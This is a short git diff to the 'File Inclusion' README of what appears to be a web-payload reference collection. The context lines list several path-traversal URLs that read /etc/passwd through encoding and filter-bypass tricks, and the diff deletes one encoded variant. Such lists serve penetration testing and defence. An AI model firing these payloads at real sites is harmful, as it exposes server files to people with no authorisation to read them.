diff --git a/File Inclusion/README.md b/File Inclusion/README.md index 8c2766a8..c2b41722 100644 --- a/File Inclusion/README.md +++ b/File Inclusion/README.md @@ -90,7 +90,6 @@ http://example.com/index.php?page=../../../[ADD MORE]../../../../etc/passwd http://example.com/index.php?page=....//....//etc/passwd http://example.com/index.php?page=..///////..////..//////etc/passwd http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd -http://example.com/index.php?page=%2F%7Betc%2C%7D%2F%7Bpasswd%2C%7D ``` ## Remote File Inclusion